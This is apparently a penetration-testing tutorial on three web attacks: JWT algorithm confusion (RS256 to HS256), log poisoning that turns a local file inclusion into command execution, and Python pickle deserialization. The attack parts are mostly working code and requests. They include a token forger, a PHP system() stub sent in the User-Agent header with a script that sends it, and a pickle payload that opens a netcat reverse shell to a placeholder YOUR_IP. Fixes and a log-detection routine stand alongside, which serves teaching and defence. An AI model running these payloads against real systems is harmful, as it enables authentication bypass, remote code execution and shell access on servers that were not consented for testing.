JWT exploitation using public key

Change the algorithm (RS256 → HS256) and sign with the public key as the HMAC secret

If the server takes the algorithm from the token header and hands the same key material to whichever algorithm the header names, its RS256 verification key becomes an HS256 secret. The public key is not secret (it is often exposed at a JWKS endpoint, shipped to clients, or reused from TLS), so anyone holding it can mint a signature the server accepts.

  • Change `alg` in the JWT header from RS256 to HS256 and base64url-encode the modified header; edit the payload claims as required.
  • Convert the public key file to hex so openssl can use it as a raw HMAC key. The bytes must be exactly what the server loads, including the PEM's trailing newline:

```
cat key | xxd -p | tr -d "\n"
```

  • HMAC-SHA256 the signing input, which is the base64url header and payload joined by a dot (not the whole token, and no trailing newline):

```
echo -n "<HEADER>.<PAYLOAD>" | openssl dgst -sha256 -mac HMAC -macopt hexkey:<KEY>
```

  • Take only the hex digest openssl prints after the `=` sign and turn it into unpadded base64url:

```
python3 -c "import base64, binascii; print(base64.urlsafe_b64encode(binascii.a2b_hex('<SECRET>')).decode().rstrip('='))"
```

  • Replace the signature (the third segment) of the token with that value and send it.

Caveat: current JWT libraries either require the caller to pin the accepted algorithms or refuse a PEM-looking string as an HMAC key, so this only works against code that trusts the header's `alg`. If a forged token is rejected, the usual cause is a byte mismatch: retry with and without the trailing newline, or with the DER rather than PEM encoding, because the HMAC key must be the exact bytes the server uses.
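The whole procedure above in one place, as an added example (not from the original page): it builds the HS256-forged token exactly as the shell steps do, then runs it through a verifier that takes the algorithm from the header (the vulnerable pattern) and through one that pins RS256 (the fix). The PEM is a constructed placeholder, not a real RSA key; only its bytes matter to the forgery. The RS256 branch needs the `cryptography` package and a genuine key and is not exercised here.

```python
import base64
import binascii
import hashlib
import hmac
import json

# Constructed placeholder standing in for the server's RS256 verification key as
# it sits on disk. It is NOT a real RSA key: the forgery only needs the exact
# bytes the server hands to its JWT library, trailing newline included.
PUBLIC_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAEXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAM\n"
    b"PLEEXAMPLEEXAMPLEEXAMPLEEXAMPLEAgMBAAE=\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url(data: bytes) -> str:
    """base64url without '=' padding, the encoding JWT segments use."""
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url: restore padding, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_from_hexkey(signing_input: str, hexkey: str) -> str:
    """Same operation as the xxd/openssl steps: HMAC-SHA256 over
    'header.payload' keyed with the hex-encoded key, returned as the
    base64url signature segment."""
    key = binascii.a2b_hex(hexkey)
    digest = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return b64url(digest)


def forge_hs256(claims: dict, hmac_key: bytes) -> str:
    """Attacker side: header says HS256, signature is an HMAC keyed with the
    server's public key bytes."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    return signing_input + "." + hs256_from_hexkey(signing_input, hmac_key.hex())


def verify(token: str, key_pem: bytes, allowed_algs=("RS256",)) -> dict:
    """Server side. allowed_algs=("RS256", "HS256") models the vulnerable code
    path: the header picks the algorithm and the same key bytes are fed to it.
    The default pins RS256, which is the fix."""
    head_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(head_b64))
    alg = header.get("alg")
    if alg not in allowed_algs:
        raise ValueError(f"algorithm {alg!r} not allowed")
    signing_input = f"{head_b64}.{payload_b64}".encode("ascii")
    signature = b64url_decode(sig_b64)
    if alg == "HS256":
        expected = hmac.new(key_pem, signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, signature):
            raise ValueError("bad HMAC signature")
        return json.loads(b64url_decode(payload_b64))
    # alg == "RS256": real RSA verification. Needs the 'cryptography' package and
    # a genuine key, so it is never reached with the placeholder PEM above.
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding

    public_key = serialization.load_pem_public_key(key_pem)
    public_key.verify(signature, signing_input, padding.PKCS1v15(), hashes.SHA256())
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    forged = forge_hs256({"sub": "alice", "admin": True}, PUBLIC_PEM)
    print(forged)
    print("header-driven server accepts:", verify(forged, PUBLIC_PEM, ("RS256", "HS256")))
    try:
        verify(forged, PUBLIC_PEM)
    except ValueError as err:
        print("pinned server rejects:", err)
```

The pinned verifier rejects the token on the `alg` check before touching any key material, which is the property to look for in the target's code: the server, never the token, decides the algorithm.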

Log Poisoning

What does it mean?

  • A technique for turning a local file inclusion (LFI) into code execution, typically to get a reverse shell.
  • The attacker writes PHP code into a server log through a request field the server logs verbatim (usually the User-Agent), then includes that log file through the LFI so PHP executes the injected code.

What are the signs of this bug?

  • A parameter that ends up in include(), require() or a similar construct. If the file is only read with file_get_contents() or readfile(), the log is displayed but the PHP inside it is not executed.
  • A log file you can read through the LFI, for example /var/log/apache2/access.log or /var/log/httpd/access_log. The web-server user needs read permission on the file and execute (search) permission on every directory in its path. On Debian/Ubuntu the default /var/log/apache2 is owned by root:adm with mode 750, so access.log is usually not readable there; other logs (mail, FTP, SSH, proxy) are worth checking in that case.

How can I exploit this?

  • Put the following PHP in the User-Agent header of a request. Apache writes the header into access.log unchanged, so the payload must not be URL-encoded. A payload with a syntax error stays in the log and breaks every later inclusion, so get it right the first time.
  • The PHP calls system() on a GET parameter named poison, which turns the LFI into a command-execution primitive:

```
GET /v1/signin.php?page=/var/log/apache2/access.log HTTP/1.1
Host: example.com
User-Agent: Mozilla <?php system($_GET['poison']); ?> Firefox
Accept: text/html
Connection: close
```

Send the request, then request the included log again with your command in the poison parameter (use a normal User-Agent so this request does not add a second copy of the payload):

```
http://example.com/v1/signin.php?page=/var/log/apache2/access.log&poison=whoami
```
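The two requests above scripted, plus the detection a defender would run over the same log, as an added example that is not part of the original page. The host, LFI endpoint and parameter names are assumptions taken from the request shown above; the access.log excerpt is constructed. The two network functions are not run here; the detection function is exercised on the sample log.

```python
import re
import urllib.parse
import urllib.request

# Constructed values. Host, LFI endpoint and parameter name come from recon of
# the target; these mirror the request shown above.
TARGET = "http://example.com"
LFI_PATH = "/v1/signin.php"
LOG_PATH = "/var/log/apache2/access.log"
PHP_STUB = "Mozilla <?php system($_GET['poison']); ?> Firefox"


def poison_log(target: str = TARGET, user_agent: str = PHP_STUB) -> int:
    """Step 1 (network): any request carries the stub in User-Agent. Apache
    writes the header into access.log unchanged, so it is sent raw, not
    URL-encoded."""
    req = urllib.request.Request(target + "/", headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def run_command(cmd: str, target: str = TARGET) -> str:
    """Step 2 (network): include the log through the LFI so PHP executes the
    stub. A plain User-Agent keeps this request from adding a second stub."""
    query = urllib.parse.urlencode({"page": LOG_PATH, "poison": cmd})
    req = urllib.request.Request(
        f"{target}{LFI_PATH}?{query}", headers={"User-Agent": "Mozilla/5.0"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Defender side: both steps leave a recognisable trail in the combined log format.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PHP_OPEN_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
LOG_INCLUDE = re.compile(r"/var/log/|access[._]log|error[._]log", re.IGNORECASE)


def find_log_poisoning(log_text: str) -> list:
    """Flag lines carrying a PHP open tag in any logged field (the poisoning
    request) or referencing a log file in the request line (the trigger)."""
    findings = []
    for line in log_text.splitlines():
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        reasons = []
        if any(PHP_OPEN_TAG.search(m[f]) for f in ("ua", "request", "referer")):
            reasons.append("php-tag")
        if LOG_INCLUDE.search(m["request"]):
            reasons.append("log-include")
        if reasons:
            findings.append({"ip": m["ip"], "request": m["request"], "reasons": reasons})
    return findings


# Constructed access.log excerpt: one normal hit, then the two attack requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /v1/signin.php?page=/var/log/apache2/access.log HTTP/1.1" 200 4096 "-" "Mozilla <?php system($_GET['poison']); ?> Firefox"
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /v1/signin.php?page=/var/log/apache2/access.log&poison=whoami HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in find_log_poisoning(SAMPLE_LOG):
        print(hit)
```

The detection keys on two independent signals, a PHP open tag anywhere in a logged field and a request that names a log file, so a single alert on either one is worth a look even when the other is absent.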

Insecure Deserialization

What does it mean?

  • The application deserializes data an attacker controls (cookies, hidden form fields, API bodies, cached objects) without validating it.
  • Deserialization reconstructs objects and, in most formats, runs code while doing so (constructors, magic methods such as __wakeup() or __reduce__(), readObject() in Java), so the attacker can replace the expected data with an object graph that executes their code or corrupts application state.

What are the signs of this bug?

  • Look at all data being passed into the website and try to identify anything that looks like serialized data.
  • Serialized data is relatively easy to spot once you know each language's format: Java objects start with the bytes AC ED 00 05 (rO0AB in base64), PHP serialize() output looks like O:4:"User":1:{...}, Python pickle streams start with 0x80 followed by the protocol number (gASV in base64 for protocol 4), and .NET BinaryFormatter blobs start with AAEAAAD///// in base64.

How can I find it?

  • Any application that stores or fetches data with no validation or integrity check on the data it retains or retrieves.
  • A few examples of applications of this nature are:
    • E-commerce sites
    • Forums
    • APIs
    • Application runtimes (Tomcat, Jenkins, JBoss, etc.)
Reverse shell from a pickle payload

```python
import base64
import os
import pickle

# Reverse-shell one-liner; replace YOUR_IP with your listener (e.g. nc -lvnp 1337)
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_IP 1337 > /tmp/f'


class rce(object):
    # pickle records the callable and arguments returned here; the victim's
    # pickle.loads() calls os.system(command) while rebuilding the object
    def __reduce__(self):
        return (os.system, (command,))


# base64 so the payload survives transport in a cookie or parameter
print(base64.b64encode(pickle.dumps(rce())).decode())
```
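The same gadget on the victim side, with the two fixes a practitioner would want next to it, as an added example that is not part of the original page. The gadget uses eval("2+2") instead of os.system so it is harmless to run; the vulnerable loader, a restricted unpickler that allow-lists globals (the pattern from the Python pickle documentation), and an HMAC integrity check before unpickling are shown side by side. The signing key is constructed.

```python
import base64
import builtins
import hashlib
import hmac
import io
import pickle

# Constructed server-side secret; a real service loads it from a secret store.
SIGNING_KEY = b"constructed-example-key-do-not-reuse"


class Gadget:
    """Attacker object: __reduce__ makes pickle call eval("2+2") on load.
    Harmless here; the payload above swaps in os.system and a shell one-liner."""

    def __reduce__(self):
        return (eval, ("2+2",))


def encode(obj) -> str:
    """Serialize the way the vulnerable app expects its data (base64 pickle)."""
    return base64.b64encode(pickle.dumps(obj)).decode("ascii")


def make_payload() -> str:
    return encode(Gadget())


def unsafe_loads(payload_b64: str):
    """Vulnerable: untrusted bytes straight into pickle.loads."""
    return pickle.loads(base64.b64decode(payload_b64))


# Fix 1: allow-list the globals a pickle may reference. os.system,
# builtins.eval, subprocess.Popen and friends never resolve.
SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "bytes",
                 "int", "float", "bool", "complex", "range", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(payload_b64: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(payload_b64))).load()


# Fix 2: only accept pickles the server itself produced. MAC the blob on the
# way out and check the MAC before a single byte reaches the unpickler.
def sign_obj(obj, key: bytes = SIGNING_KEY) -> bytes:
    blob = pickle.dumps(obj)
    mac = hmac.new(key, blob, hashlib.sha256).hexdigest().encode("ascii")
    return mac + b"." + base64.b64encode(blob)


def verified_loads(signed: bytes, key: bytes = SIGNING_KEY):
    mac, _, blob_b64 = signed.partition(b".")
    blob = base64.b64decode(blob_b64)
    expected = hmac.new(key, blob, hashlib.sha256).hexdigest().encode("ascii")
    if not hmac.compare_digest(mac, expected):
        raise ValueError("MAC mismatch: refusing to unpickle")
    return pickle.loads(blob)


if __name__ == "__main__":
    payload = make_payload()
    print("unsafe_loads ran the gadget, returned:", unsafe_loads(payload))
    try:
        restricted_loads(payload)
    except pickle.UnpicklingError as err:
        print("restricted_loads refused:", err)
    legit = sign_obj({"user": "alice", "cart": [1, 2]})
    print("verified_loads accepts the server's own blob:", verified_loads(legit))
    forged = legit.split(b".")[0] + b"." + payload.encode("ascii")
    try:
        verified_loads(forged)
    except ValueError as err:
        print("verified_loads refused the swapped blob:", err)
```

The MAC is the stronger of the two fixes: the allow-list only narrows what a pickle can name, while the MAC stops attacker-supplied pickles from being parsed at all. Where the data does not need to be Python objects, JSON with schema validation removes the problem entirely.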